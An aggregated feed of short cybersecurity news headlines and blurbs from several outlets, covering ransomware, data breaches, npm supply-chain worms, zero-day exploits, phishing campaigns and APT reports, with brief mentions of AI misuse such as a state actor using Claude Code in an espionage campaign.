In Other News: Deepwatch Layoffs, macOS Vulnerability, Amazon AI Bug Bounty

Other noteworthy stories that might have slipped under the radar: EchoGram attack undermines AI guardrails, Asahi brewer still crippled after ransomware attack, Sora 2 system prompt uncovered.

The post In Other News: Deepwatch Layoffs, macOS Vulnerability, Amazon AI Bug Bounty appeared first on SecurityWeek.

Checkout.com Discloses Data Breach After Extortion Attempt

The information was stolen from a legacy cloud file storage system, not from its payment processing platform.

The post Checkout.com Discloses Data Breach After Extortion Attempt appeared first on SecurityWeek.

Washington Post Says Nearly 10,000 Employees Impacted by Oracle Hack

The media company admitted that cybercriminals attempted to extort a payment after stealing personal information. 

The post Washington Post Says Nearly 10,000 Employees Impacted by Oracle Hack appeared first on SecurityWeek.

Akira Ransomware Group Made $244 Million in Ransom Proceeds

Akira was seen exploiting SonicWall vulnerabilities and encrypting Nutanix Acropolis Hypervisor (AHV) VM disk files this year.

The post Akira Ransomware Group Made $244 Million in Ransom Proceeds appeared first on SecurityWeek.

Amazon Detects 150,000 NPM Packages in Worm-Powered Campaign

A financially motivated threat actor automated the package publishing process in a coordinated tea.xyz token farming campaign.

The post Amazon Detects 150,000 NPM Packages in Worm-Powered Campaign  appeared first on SecurityWeek.

Imunify360 Vulnerability Could Expose Millions of Sites to Hacking

A vulnerability in ImunifyAV can be exploited for arbitrary code execution by uploading a malicious file to shared servers.

The post Imunify360 Vulnerability Could Expose Millions of Sites to Hacking appeared first on SecurityWeek.

Anthropic Says Claude AI Powered 90% of Chinese Espionage Campaign

A state-sponsored threat actor manipulated Claude Code to execute cyberattacks on roughly 30 organizations worldwide.

The post Anthropic Says Claude AI Powered 90% of Chinese Espionage Campaign appeared first on SecurityWeek.

Fortinet finally cops to critical make-me-admin bug under active exploitation

More than a month after PoC made public

Fortinet finally published a security advisory on Friday for a critical FortiWeb path traversal vulnerability under active exploitation – but it appears digital intruders got a month's head start.…

Crims poison 150K+ npm packages with token-farming malware

Amazon spilled the TEA

Yet another supply chain attack has hit the npm registry in what Amazon describes as "one of the largest package flooding incidents in open source registry history" - but with a twist. Instead of injecting credential-stealing code or ransomware into the packages, this one is a token farming campaign.…

FBI flags scam targeting Chinese speakers with bogus surgery bills

Crooks spoof US insurers, threaten bogus extradition to pry loose personal data and cash

Chinese speakers in the US are being targeted as part of an aggressive health insurance scam campaign, the FBI warns.…

CISA flags imminent threat as Akira ransomware starts hitting Nutanix AHV

Advisory updated as leading cybercrime crew opens up its target pool

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued new guidance to organizations on the Akira ransomware operation, which poses an imminent threat to critical sectors.…

Clop claims it hacked 'the NHS.' Which bit? Your guess is as good as theirs

Cybercrime crew has ravaged multiple private organizations using Oracle EBS zero-day for months

The UK's National Health Service (NHS) is investigating claims of a cyberattack by extortion crew Clop.…

Kubernetes overlords decide Ingress NGINX isn’t worth saving

Maintenance to end next year after ‘helpful options’ became ‘serious security flaws’

Kubernetes maintainers have decided it’s not worth trying to save Ingress NGINX and will instead stop work on the project and retire it in March 2026.…

Chinese spies told Claude to break into about 30 critical orgs. Some attacks succeeded

Anthropic dubs this the first AI-orchestrated cyber snooping campaign

Chinese cyber spies used Anthropic's Claude Code AI tool to attempt digital break-ins at about 30 high-profile companies and government organizations – and the government-backed snoops "succeeded in a small number of cases," according to a Thursday report from the AI company.…

Ransomed CTO falls on sword, refuses to pay extortion demand

Checkout.com will instead donate the amount to fund cybercrime research

Digitial extortion is a huge business, because affected orgs keep forking over money to get their data back. However, instead of paying a ransom demand after getting hit by extortionists last week, payment services provider Checkout.com donated the demanded amount to fund cybercrime research.…

Ubuntu 25.10's Rusty sudo holes quickly welded shut

The goal of 'oxidizing' the Linux distro hits another bump

Two vulnerabilities in Ubuntu 25.10's new "sudo-rs" command have been found, disclosed, and fixed in short order.…

Extra, extra, read all about it: Washington Post clobbered in Clop caper

Nearly 10,000 staff and contractors warned after attackers raided newspaper's Oracle EBS setup

The Washington Post has confirmed that nearly 10,000 employees and contractors had sensitive personal data stolen in the Clop-linked Oracle E-Business Suite (EBS) attacks.…

Rhadamanthys malware admin rattled as cops seize a thousand-plus servers

Operation Endgame also takes down Elysium and VenomRAT infrastructure

International cops have pulled apart the Rhadamanthys infostealer operation, seizing 1,025 servers tied to the malware in coordinated raids between November 10-13.…

NHS supplier ends probe into ransomware attack that contributed to patient death

Synnovis's 18-month forensic review of Qilin intrusion completed, now affected patients to be notified

Synnovis has finally wrapped up its investigation into the 2024 ransomware attack that crippled pathology services across London, ending an 18-month effort to untangle what the NHS supplier describes as one of the most complex data reconstruction jobs it has ever faced.…

Google sues 25 China-based scammers behind Lighthouse 'phishing for dummies' kit

600+ phishing websites and 116 of these use a Google logo

Google has filed a lawsuit against 25 unnamed China-based scammers, which it claims have stolen more than 115 million credit card numbers in the US as part of the Lighthouse phishing operation.…

Attackers turned Citrix, Cisco 0-day exploits into custom-malware hellscape

Vendors (still) keep mum

An "advanced" attacker exploited CitrixBleed 2 and a max-severity Cisco Identity Services Engine (ISE) bug as zero-days to deploy custom malware, according to Amazon Chief Information Security Officer CJ Moses.…

Bitcoin bandit's £5B bubble bursts as cops wrap seven-year chase

Metropolitan Police lands lengthy sentence following 'complex' investigation

The Metropolitan Police's seven-year investigation into a record-setting fraudster has ended after she was sentenced to 11 years and eight months in prison on Tuesday.…

UK's Cyber Security and Resilience Bill makes Parliamentary debut

Various touch-ups added as MPs seek greater resilience to attacks on critical sectors

UK government introduced the Cyber Security and Resilience (CSR) Bill to Parliament today, marking a significant overhaul of local cybersecurity legislation to sharpen the security posture of the most critical sectors.…

Aviation watchdog says organized drone attacks will shut UK airports ‘sooner or later’

Skies are open for mischief as hard-to-trace drones and fast-moving cyber raids promise new wave of disruption

Britain's aviation watchdog has warned it's only a matter of time before organized drone attacks bring UK airports to a standstill.…

China hates crypto and scams, but is now outraged USA acquired bitcoin from a scammer

A new theory from the agency that brought us ‘America hacked itself to blame Beijing’

China’s National Computer Virus Emergency Response Center (CVERC) has alleged a nation-state entity, probably the USA, was behind a 2020 attack on a bitcoin mining operation and by doing so has gone into bat for entities that Beijing usually blasts.…

Australia’s spy boss says authoritarian nations ready to commit ‘high-impact sabotage’

‘Elite teams’ are pondering cyber-attacks to turn off energy supply or telecoms networks

The head of Australia’s Security Intelligence Organisation (ASIO) has warned that authoritarian regimes “are growing more willing to disrupt or destroy critical infrastructure”, using cyber-sabotage.…

North Korean spies turn Google's Find Hub into remote-wipe weapon

KONNI espionage crew covertly abused Google’s Find My Device feature to remotely factory-reset Android phones

North Korean state-backed spies have found a new way to torch evidence of their own cyber-spying – by hijacking Google's Find Hub service to remotely wipe Android phones belonging to their South Korean targets.…

EU's reforms of GDPR, AI slated by privacy activists for 'playing into Big Tech’s hands'

Lobbying efforts gain ground as proposals carve myriad holes into regulations

Privacy advocates are condemning the European Commission's leaked plans to overhaul digital privacy legislation, accusing officials of bypassing proper legislative processes to favor Big Tech interests.…

OWASP Top 10: Broken access control still tops app security list

Risk list highlights misconfigs, supply chain failures, and singles out prompt injection in AI apps

The Open Worldwide Application Security Project (OWASP) just published its top 10 categories of application risks for 2025, its first list since 2021. It found that while broken access control remains the top issue, security misconfiguration is a strong second, and software supply chain issues are still prominent.…

Hitachi-owned GlobalLogic admits data stolen on 10k current and former staff

Clop's Oracle EBS exploit spree shows no sign of slowing, claims nearly 30 more casualties in media, finance, and tech.

Digital engineering outfit GlobalLogic says personal data from more than 10,000 current and former employees was exposed in the wave of Oracle E-Business Suite (EBS) attacks attributed to the Clop ransomware gang. The Hitachi-owned biz joins a growing roster of high-profile victims that also now includes The Washington Post and Allianz UK.…

UK asks cyberspies to probe whether Chinese buses can be switched off remotely

Norwegian testers claim maker has remote access, while UK importer says supplier complies with the law

UK governmental is working with the National Cyber Security Centre to understand and "mitigate" any risk that China-made imported electric buses could be remotely accessed and potentially disabled.…

Cyber insurers paid out over twice as much for UK ransomware attacks last year

Massive increase in policy claims… and data doesn’t even cover the major attacks of 2025

The number of successful cyber insurance claims made by UK organizations shot up last year, according to the latest figures from the industry's trade association.…

UK's Ajax fighting vehicle arrives – years late and still sending crew to hospital

Continuous track of long awaited AFV hits the ground ... and the terrain is pretty bumpy

The British Army just received its first new armored fighting vehicle (AFV) for nearly three decades, but it is years late, hit by rising costs, is still reportedly injuring its crew, and there are questions about whether it remains relevant in the age of drone warfare. …

LLM side-channel attack could allow snoops to guess what you're talking about

Encryption protects content, not context

Updated  Mischief-makers can guess the subjects being discussed with LLMs using a side-channel attack, according to Microsoft researchers. They told The Register that models from some providers, including Anthropic, AWS, DeepSeek, and Google, haven't been fixed, putting both personal users and enterprise communications at risk.…

Critical federal cybersecurity funding set to resume as government shutdown draws to a close - for now

Resolution acquiesced to by 8 Dems includes CISA Act funding, layoff reversals, and could be easily undone

The US Senate voted on Sunday to advance a short-term funding bill for the federal government, moving the country closer to ending its longest-ever shutdown. Part of the spending bill also restores critical cybersecurity programs that lapsed as the shutdown began. …

Phishers try to lure 5K Facebook advertisers with fake business pages

One company alone was hit with more than 4,200 emails

More than 5,000 businesses that use Facebook for advertising were bombarded by tens of thousands of phishing emails in a credential- and data-stealing campaign.…

Russian broker pleads guilty to profiting from Yanluowang ransomware attacks

Aleksei Volkov faces years in prison, may have been working with other crews

A Russian national will likely face several years in US prison after pleading guilty to a range of offenses related to his work with ransomware crews.…

Allianz UK joins growing list of Clop’s Oracle E-Business Suite victims

Insurance giant’s UK arm says cybercriminals misattributed the real victim

Allianz UK confirms it was one of the many companies that fell victim to the Clop gang's Oracle E-Business Suite (EBS) attack after crims reported that they had attacked a subsidiary.…

As AI enables bad actors, how are 3,000+ teams responding?

Breaking down trends in exposure management with insights from 3,000+ organizations and Intruder's security experts

Partner Content  This year has shown just how quickly new exposures can emerge, with AI-generated code shipped before review, cloud sprawl racing ahead of controls, and shadow IT opening blind spots. Supply chain compromises have disrupted transport, manufacturing, and other critical services. On the attacker side, AI-assisted exploit development is making it faster than ever to turn those weaknesses into working attacks.…

Cisco creating new security model using 30 years of data describing cyber-dramas and saves

Doubles parameters to over 17 billion, to detect threats and recommend actions

Exclusive  Cisco is working on a new AI model that will more than double the number of parameters used to train its current flagship Foundation-Sec-8B.…

Microsoft teases agents that become ‘independent users within the workforce’

Licensing expert worries they’ll be out of control on day one

Microsoft has teased what it’s calling “a new class” of AI agents “that operate as independent users within the enterprise workforce.”…

Data breach at Chinese infosec firm reveals cyber-weapons and target list

PLUS: India’s tech services exports growing fast; South Korea puts the bite on TXT spam; NTT gets into autonomous vehicles; and more!

Asia In Brief  Chinese infosec blog MXRN last week reported a data breach at a security company called Knownsec that has ties to Beijing and Chinas military.…

Louvre's pathetic passwords belong in a museum, just not that one

PLUS: CISA layoffs continue; Lawmakers criticize camera security; China to execute scammers; And more

Infosec in brief  There's no indication that the brazen bandits who stole jewels from the Louvre attacked the famed French museum's systems, but had they tried, it would have been incredibly easy.…

Who's watching the watchers? This Mozilla fellow, and her Surveillance Watch map

Esra'a Al Shafei spoke with The Reg about the spy tech 'global trade'

interview  Digital rights activist Esra'a Al Shafei found FinFisher spyware on her device more than a decade ago. Now she's made it her mission to surveil the companies providing surveillanceware, their customers, and their funders.…

Previously unknown Landfall spyware used in 0-day attacks on Samsung phones

'Precision espionage campaign' began months before the flaw was fixed

A previously unknown Android spyware family called LANDFALL exploited a zero-day in Samsung Galaxy devices for nearly a year, installing surveillance code capable of recording calls, tracking locations, and harvesting photos and logs before Samsung finally patched it in April.…

Cybercrims plant destructive time bomb malware in industrial .NET extensions

Multi-year wait for destruction comes to an end for mystery attackers

Security experts have helped remove malicious NuGet packages planted in 2023 that were designed to destroy systems years in advance, with some payloads not due to hit until the latter part of this decade.…

Microsoft's data sovereignty: Now with extra sovereignty!

Under shadow of US CLOUD Act, Redmond releases raft of services to calm customers in the EU

Microsoft is again banging the data sovereignty drum in Europe, months after admitting in a French court it couldn't guarantee that data will not be transmitted to the US government when it is legally required to do so.…

Bank of England says JLR's cyberattack contributed to UK's unexpectedly slower GDP growth

This kind of material economic impact from online crooks thought to be a UK-first

The Bank of England (BoE) has cited the cyberattack on Jaguar Land Rover (JLR) as one of the reasons for the country's slower-than-expected GDP growth in its latest rates decision.…

How TeamViewer builds enterprise trust through security-first design

What to do when even your espresso machine needs end-to-end encryption

Sponsored Feature  The security landscape is getting more perilous day by day, as both nation-state groups and financially-motivated hackers ramp up their activity.…

Gootloader malware back for the attack, serves up ransomware

Move fast - miscreants compromised a domain controller in 17 hours

Gootloader JavaScript malware, commonly used to deliver ransomware, is back in action after a period of reduced activity.…

Cisco warns of 'new attack variant' battering firewalls under exploit for 6 months

Plus 2 new critical vulns - patch now

Cisco warned customers about another wave of attacks against its firewalls, which have been battered by intruders for at least six months. It also patched two critical bugs in its Unified Contact Center Express (UCCX) software that aren't under active exploitation - yet.…

You'll never guess what the most common passwords are. Oh, wait, yes you will

Most of you still can't do better than 123456?

123456. admin. password. For years, the IT world has been reminding users not to rely on such predictable passwords. And yet here we are with another study finding that those sorts of quickly-guessable, universally-held-to-be-bad passwords are still the most popular ones.…

SonicWall fingers state-backed cyber crew for September firewall breach

Spies, not crooks, were behind digital heist – damage stopped at the backups, says US cybersec biz

SonicWall has blamed an unnamed, state-sponsored collective for the September break-in that saw cybercriminals rifle through a cache of firewall configuration backups.…

Malware-pwned laptop gifts cybercriminals Nikkei's Slack

Stolen creds let miscreants waltz into 17K employees' chats, spilling info on staff and partners

Japanese media behemoth Nikkei has admitted to a data breach after miscreants slipped into its internal Slack workspace, exposing the personal details of more than 17,000 employees and business partners.…

Why UK businesses are paying ICO millions for password mistakes you're probably making right now

Strongly-worded emails to staff telling them to be more careful aren't going to cut it anymore

Partner Content  UK GDPR Article 32 mandates "appropriate security measures". The ICO has defined what that means: multi-million-pound fines for password failures. The violations that trigger them? Small, familiar, and happening in your organization right now.…

Uncle Sam lets Google take Wiz for $32B

Second time's the charm for after Wiz rejected Google's $23B offer last year

Google's second attempt to acquire cloud security firm Wiz is going a lot better than the first, with the Department of Justice clearing the $32 billion deal, which ranks as Google's largest-ever acquisition.…

AMD red-faced over random-number bug that kills cryptographic security

Local privileges required to exploit flaw in Ryzen and Epyc CPUs. Some patches available, more on the way

AMD will issue a microcode patch for a high-severity vulnerability that could weaken cryptographic keys across Epyc and Ryzen CPUs.…

Chinese Hackers Automate Cyber-Attacks With AI-Powered Claude Code

Anthropic’s Claude Code AI assistant performed 80% to 90% of the tasks involved in a recent cyber-attack campaign, said Anthropic researchers

Akira Ransomware Haul Surpasses $244M in Illicit Proceeds

Akira ransomware has extorted $244M since September 2025, with some attacks exfiltrating data in just two hours, a joint cybersecurity advisory warns

Google Files Lawsuit to Dismantle 'Lighthouse' Smishing Kit

Google filed a civil lawsuit against 25 individuals accused of ties to a Chinese cyber collective known as the ‘Smishing Triad’

“IndonesianFoods” npm Worm Publishes 44,000 Malicious Packages

A new npm worm dubbed “IndonesianFoods” has doubled the number of known malicious packages

CISO Pay Increases 7% As Budget Growth Slows

An IANS study finds CISO compensation rose 6.7% on average in 2025 while budget growth halved compared to 2024

Operation Endgame 3.0 Dismantles Three Major Malware Networks

A global law enforcement operation has taken down the Rhadamanthys infostealer, VenomRAT trojan and the Elysium botnet

Improve Collaboration to Hit Back At Rising Fraud, Says techUK

Industry body techUK calls for real-time intelligence sharing across sectors to combat fraud

Synnovis Finally Issues Breach Notification After 2024 Ransomware Attack

NHS provider Synnovis is notifying clients about the extent of a data breach 17 months after it suffered a ransomware attack

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack

GlobalLogic has notified 10,000 employees their data was stolen in the Oracle EBS campaign

Cyber-Insurance Payouts Soar 230% in UK

UK cyber-insurers paid 230% more to policyholders in 2024 than the year before

Microsoft Fixes Windows Kernel Zero Day in November Patch Tuesday

Microsoft has patched a zero-day vulnerability in the Windows Kernel under active exploitation by threat actors

UK Government Finally Introduces Cyber Security and Resilience Bill

The UK government is overhauling cybersecurity laws for the first time since 2018 with the Cyber Security and Resilience Bill

Week in review: Windows kernel flaw patched, suspected Fortinet FortiWeb zero-day exploited

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Adopting a counterintelligence mindset in luxury logistics In this Help Net Security interview, Andrea Succi, Group CISO at Ferrari Group, discusses how cybersecurity is integrated into every aspect of the logistics industry. He explains why protecting data can be as critical as securing physical assets and how a layered defense approach helps safeguard both. Succi adds that awareness, collaboration, and … More →

The post Week in review: Windows kernel flaw patched, suspected Fortinet FortiWeb zero-day exploited appeared first on Help Net Security.

Chinese cyber spies used Claude AI to automate 90% of their attack campaign, Anthropic claims

Anthropic threat researchers believe that they’ve uncovered and disrupted the first documented case of a cyberattack executed with the help of its agentic AI and minimal human intervention. “The threat actor manipulated [Anthropic’s large language model] Claude into functioning as an autonomous cyber attack agent performing cyber intrusion operations rather than merely providing advice to human operators,” the company noted. “Analysis of operational tempo, request volumes, and activity patterns confirms the AI executed approximately 80 … More →

The post Chinese cyber spies used Claude AI to automate 90% of their attack campaign, Anthropic claims appeared first on Help Net Security.

A suspected Fortinet FortiWeb zero-day is actively exploited, researchers warn

A suspected (but currently unidentified) zero-day vulnerability in Fortinet FortiWeb is being exploited by unauthenticated attackers to create new admin accounts on vulnerable, internet-facing devices. Whether intentionally or accidentally, the vulnerability (or this specific path for triggering it) has been addressed in the latest FortiWeb version (8.0.2), Rapid7 researchers confirmed. Exploitation in the wild Exploitation attempts were first observed at the beginning of October by threat intelligence company Defused, after one of their honeypots had … More →

The post A suspected Fortinet FortiWeb zero-day is actively exploited, researchers warn appeared first on Help Net Security.

Trulioo helps enterprises accelerate business onboarding

Trulioo announced Trulioo credit decisioning, a new capability that delivers comprehensive financial, credit and risk insights through the Trulioo global identity platform. The launch follows a 102% year-over-year increase in U.S. Know Your Business (KYB) transaction growth, underscoring the company’s innovation and leadership in global business onboarding. As regulatory pressure intensifies and fraud grows more sophisticated, financial signals and creditworthiness has become a critical factor in determining risk. Trulioo credit decisioning drives smarter evaluation, routing … More →

The post Trulioo helps enterprises accelerate business onboarding appeared first on Help Net Security.

Why your security strategy is failing before it even starts

In this Help Net Security interview, Adnan Ahmed, CISO at Ornua, discusses how organizations can build a cybersecurity strategy that aligns with business goals. He explains why many companies stumble by focusing on technology before understanding risk and shares how embedding cybersecurity across the business helps build resilience. Ahmed also outlines how a mature roadmap should integrate zero trust principles, operational resilience, and a security culture across both IT and OT environments. When you think … More →

The post Why your security strategy is failing before it even starts appeared first on Help Net Security.

Protecting mobile privacy in real time with predictive adversarial defense

Mobile sensors are everywhere, quietly recording how users move, tilt, or hold their phones. The same data that powers step counters and activity trackers can also expose personal details such as gender, age, or even identity. A new study introduces a method designed to stop that information from being inferred in the first place, without interrupting the phone’s normal functions. Overview of the PATN framework. The system includes PATN training, where the network learns to … More →

The post Protecting mobile privacy in real time with predictive adversarial defense appeared first on Help Net Security.

Los Alamos researchers warn AI may upend national security

For decades, the United States has built its defense posture around predictable timelines for technological progress. That assumption no longer holds, according to researchers at Los Alamos National Laboratory. Their paper argues that AI is advancing so quickly that the current defense system cannot adapt in time. The authors warn that the United States risks strategic surprise if it continues to rely on programs designed in an era before capable machine intelligence. They compare the … More →

The post Los Alamos researchers warn AI may upend national security appeared first on Help Net Security.

What happens when employees take control of AI

Executives may debate AI strategy, but many of the advances are happening at the employee level. A recent Moveworks study shows that AI adoption is being led from the ground up, with employees, not senior leaders, driving the change. The research found that large companies are seeing non-technical employees lead AI projects once limited to IT teams. This shift is changing how technology spreads, how decisions are made, and who shapes the next phase of … More →

The post What happens when employees take control of AI appeared first on Help Net Security.

New infosec products of the week: November 14, 2025

Here’s a look at the most interesting products from the past week, featuring releases from Action1, Avast, Cyware, Firewalla, and Nokod Security. Action1 addresses Intune gaps with patching and risk-based vulnerability prioritization Action1 announced new integrations that extend Microsoft Intune with advanced patching and vulnerability management. The enhancements close security and compliance gaps in Intune by adding comprehensive third-party application patching, risk-based vulnerability prioritization, and real-time visibility across Windows, macOS, and Linux. Avast delivers AI-powered … More →

The post New infosec products of the week: November 14, 2025 appeared first on Help Net Security.

Fake spam filter alerts are hitting inboxes

A new phishing campaign is attempting to trick users into believing they’ve missed important emails, security researchers are warning. The emails The bogus email alerts look like they are coming from the recipient’s email domain, and falsely claim that due to a “Secure Message system” upgrade, important messages have been blocked. To “release” (view) the emails, recipients are instructed to click on the “Move To Inbox” button/link and, if they do, they are taken to … More →

The post Fake spam filter alerts are hitting inboxes appeared first on Help Net Security.

How password managers can be hacked – and how to stay safe

Look no further to learn how cybercriminals could try to crack your vault and how you can keep your logins safe

Why shadow AI could be your biggest security blind spot

From unintentional data leakage to buggy code, here’s why you should care about unsanctioned AI use in your company

In memoriam: David Harley

Former colleagues and friends remember the cybersecurity researcher, author, and mentor whose work bridged the human and technical sides of security

The who, where, and how of APT attacks in Q2 2025–Q3 2025

ESET Chief Security Evangelist Tony Anscombe highlights some of the key findings from the latest issue of the ESET APT Activity Report

ESET APT Activity Report Q2 2025–Q3 2025

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2025 and Q3 2025

Sharing is scaring: The WhatsApp screen-sharing scam you didn’t see coming

How a fast-growing scam is tricking WhatsApp users into revealing their most sensitive financial and other data

How social engineering works | Unlocked 403 cybersecurity podcast (S2E6)

Think you could never fall for an online scam? Think again. Here's how scammers could exploit psychology to deceive you – and what you can do to stay one step ahead

Ground zero: 5 things to do after discovering a cyberattack

When every minute counts, preparation and precision can mean the difference between disruption and disaster

This month in security with Tony Anscombe – October 2025 edition

From the end of Windows 10 support to scams on TikTok and state-aligned hackers wielding AI, October's headlines offer a glimpse of what's shaping cybersecurity right now

Fraud prevention: How to help older family members avoid scams

Families that combine open communication with effective behavioral and technical safeguards can cut the risk dramatically

Cybersecurity Awareness Month 2025: When seeing isn't believing

Deepfakes are blurring the line between real and fake and fraudsters are cashing in, using synthetic media for all manner of scams

Recruitment red flags: Can you spot a spy posing as a job seeker?

Here’s what to know about a recent spin on an insider threat – fake North Korean IT workers infiltrating western firms

How MDR can give MSPs the edge in a competitive market

With cybersecurity talent in short supply and threats evolving fast, managed detection and response is emerging as a strategic necessity for MSPs

Cybersecurity Awareness Month 2025: Cyber-risk thrives in the shadows

Shadow IT leaves organizations exposed to cyberattacks and raises the risk of data loss and compliance failures

Gotta fly: Lazarus targets the UAV sector

ESET research analyzes a recent instance of the Operation DreamJob cyberespionage campaign conducted by Lazarus, a North Korea-aligned APT group

SnakeStealer: How it preys on personal data – and how you can protect yourself

Here’s what to know about the malware with an insatiable appetite for valuable data, so much so that it tops this year's infostealer detection charts

Cybersecurity Awareness Month 2025: Building resilience against ransomware

Ransomware rages on and no organization is too small to be targeted by cyber-extortionists. How can your business protect itself against the threat?

Minecraft mods: Should you 'hack' your game?

Some Minecraft mods don’t help build worlds – they break them. Here’s how malware can masquerade as a Minecraft mod.

IT service desks: The security blind spot that may put your business at risk

Could a simple call to the helpdesk enable threat actors to bypass your security controls? Here’s how your team can close a growing security gap.

Cybersecurity Awareness Month 2025: Why software patching matters more than ever

As the number of software vulnerabilities continues to increase, delaying or skipping security updates could cost your business dearly.

AI-aided malvertising: Exploiting a chatbot to spread scams

Cybercriminals have tricked X’s AI chatbot into promoting phishing scams in a technique that has been nicknamed “Grokking”. Here’s what to know about it.

How Uber seems to know where you are – even with restricted location permissions

Is the ride-hailing app secretly tracking you? Not really, but this iOS feature may make it feel that way.

Cybersecurity Awareness Month 2025: Passwords alone are not enough

Never rely on just a password, however strong it may be. Multi-factor authentication is essential for anyone who wants to protect their online accounts from intruders.

The case for cybersecurity: Why successful businesses are built on protection

Company leaders need to recognize the gravity of cyber risk, turn awareness into action, and put security front and center

Beware of threats lurking in booby-trapped PDF files

Looks can be deceiving, so much so that the familiar icon could mask malware designed to steal your data and money.

Manufacturing under fire: Strengthening cyber-defenses amid surging threats

Manufacturers operate in one of the most unforgiving threat environments and face a unique set of pressures that make attacks particularly damaging

New spyware campaigns target privacy-conscious Android users in the UAE

ESET researchers have discovered campaigns distributing spyware disguised as Android Signal and ToTok apps, targeting users in the United Arab Emirates

Cybersecurity Awareness Month 2025: Knowledge is power

We're kicking off the month with a focus on the human element: the first line of defense, but also the path of least resistance for many cybercriminals

This month in security with Tony Anscombe – September 2025 edition

The past 30 days have seen no shortage of new threats and incidents that brought into sharp relief the need for well-thought-out cyber-resilience plans

Roblox executors: It’s all fun and games until someone gets hacked

You could be getting more than you bargained for when you download that cheat tool promising quick wins

DeceptiveDevelopment: From primitive crypto theft to sophisticated AI-based deception

Malware operators collaborate with covert North Korean IT workers, posing a threat to both headhunters and job seekers

Watch out for SVG files booby-trapped with malware

What you see is not always what you get as cybercriminals increasingly weaponize SVG files as delivery vectors for stealthy malware

Gamaredon X Turla collab

Notorious APT group Turla collaborates with Gamaredon, both FSB-associated groups, to compromise high‑profile targets in Ukraine

Small businesses, big targets: Protecting your business against ransomware

Long known to be a sweet spot for cybercriminals, small businesses are more likely to be victimized by ransomware than large enterprises

HybridPetya: The Petya/NotPetya copycat comes with a twist

HybridPetya is the fourth publicly known real or proof-of-concept bootkit with UEFI Secure Boot bypass functionality

Introducing HybridPetya: Petya/NotPetya copycat with UEFI Secure Boot bypass

UEFI copycat of Petya/NotPetya exploiting CVE-2024-7344 discovered on VirusTotal

Are cybercriminals hacking your systems – or just logging in?

As bad actors often simply waltz through companies’ digital front doors with a key, here’s how to keep your own door locked tight

Preventing business disruption and building cyber-resilience with MDR

Given the serious financial and reputational risks of incidents that grind business to a halt, organizations need to prioritize a prevention-first cybersecurity strategy

Under lock and key: Safeguarding business data with encryption

As the attack surface expands and the threat landscape grows more complex, it’s time to consider whether your data protection strategy is fit for purpose

GhostRedirector poisons Windows servers: Backdoors with a side of Potatoes

ESET researchers have identified a new threat actor targeting Windows servers with a passive C++ backdoor and a malicious IIS module that manipulates Google search results

This month in security with Tony Anscombe – August 2025 edition

From Meta shutting down millions of WhatsApp accounts linked to scam centers all the way to attacks at water facilities in Europe, August 2025 saw no shortage of impactful cybersecurity news

Don’t let “back to school” become “back to (cyber)bullying”

Cyberbullying is a fact of life in our digital-centric society, but there are ways to push back

First known AI-powered ransomware uncovered by ESET Research

The discovery of PromptLock shows how malicious use of AI models could supercharge ransomware and other threats

"What happens online stays online" and other cyberbullying myths, debunked

Separating truth from fiction is the first step towards making better parenting decisions. Let’s puncture some of the most common misconceptions about online harassment.

The need for speed: Why organizations are turning to rapid, trustworthy MDR

How top-tier managed detection and response (MDR) can help organizations stay ahead of increasingly agile and determined adversaries

Investors beware: AI-powered financial scams swamp social media

Can you tell the difference between legitimate marketing and deepfake scam ads? It’s not always as easy as you may think.

Supply-chain dependencies: Check your resilience blind spot

Does your business truly understand its dependencies, and how to mitigate the risks posed by an attack on them?

How the always-on generation can level up its cybersecurity game

Digital natives are comfortable with technology, but may be more exposed to online scams and other threats than they think

WinRAR zero-day exploited in espionage attacks against high-value targets

The attacks used spearphishing campaigns to target financial, manufacturing, defense, and logistics companies in Europe and Canada, ESET research finds

Update WinRAR tools now: RomCom and others exploiting zero-day vulnerability

ESET Research discovered a zero-day vulnerability in WinRAR being exploited in the wild in the guise of job application documents; the weaponized archives exploited a path traversal flaw to compromise their targets

Black Hat USA 2025: Is a high cyber insurance premium about your risk, or your insurer’s?

A sky-high premium may not always reflect your company’s security posture

Android adware: What is it, and how do I get it off my device?

Is your phone suddenly flooded with aggressive ads, slowing down performance or leading to unusual app behavior? Here’s what to do.

Black Hat USA 2025: Policy compliance and the myth of the silver bullet

Who’s to blame when the AI tool managing a company’s compliance status gets it wrong?

Black Hat USA 2025: Does successful cybersecurity today increase cyber-risk tomorrow?

Success in cybersecurity is when nothing happens, plus other standout themes from two of the event’s keynotes

ESET Threat Report H1 2025: ClickFix, infostealer disruptions, and ransomware deathmatch

Threat actors are embracing ClickFix, ransomware gangs are turning on each other – toppling even the leaders – and law enforcement is disrupting one infostealer after another

Is your phone spying on you? | Unlocked 403 cybersecurity podcast (S2E5)

Here's what you need to know about the inner workings of modern spyware and how to stay away from apps that know too much

Why the tech industry needs to stand firm on preserving end-to-end encryption

Restricting end-to-end encryption on a single-country basis would not only be absurdly difficult to enforce, but it would also fail to deter criminal activity

This month in security with Tony Anscombe – July 2025 edition

Here's a look at cybersecurity stories that moved the needle, raised the alarm, or offered vital lessons in July 2025

The hidden risks of browser extensions – and how to stay safe

Not all browser add-ons are handy helpers – some may contain far more than you have bargained for

SharePoint under fire: ToolShell attacks hit organizations worldwide

The ToolShell bugs are being exploited by cybercriminals and APT groups alike, with the US on the receiving end of 13 percent of all attacks

ToolShell: An all-you-can-eat buffet for threat actors

ESET Research has been monitoring attacks involving the recently discovered ToolShell zero-day vulnerabilities

Rogue CAPTCHAs: Look out for phony verification pages spreading malware

Before rushing to prove that you're not a robot, be wary of deceptive human verification pages as an increasingly popular vector for delivering malware

Why is your data worth so much? | Unlocked 403 cybersecurity podcast (S2E4)

Behind every free online service, there's a price being paid. Learn why your digital footprint is so valuable, and when you might actually be the product.

Unmasking AsyncRAT: Navigating the labyrinth of forks

ESET researchers map out the labyrinthine relationships among the vast hierarchy of AsyncRAT variants

How to get into cybersecurity | Unlocked 403 cybersecurity podcast (S2E3)

Cracking the code of a successful cybersecurity career starts here. Hear from ESET's Robert Lipovsky as he reveals how to break into and thrive in this fast-paced field.

Task scams: Why you should never pay to get paid

Some schemes might sound unbelievable, but they’re easier to fall for than you think. Here’s how to avoid getting played by gamified job scams.

How government cyber cuts will affect you and your business

Deep cuts in cybersecurity spending risk creating ripple effects that will put many organizations at a higher risk of falling victim to cyberattacks

Gamaredon in 2024: Cranking out spearphishing campaigns against Ukraine with an evolved toolset

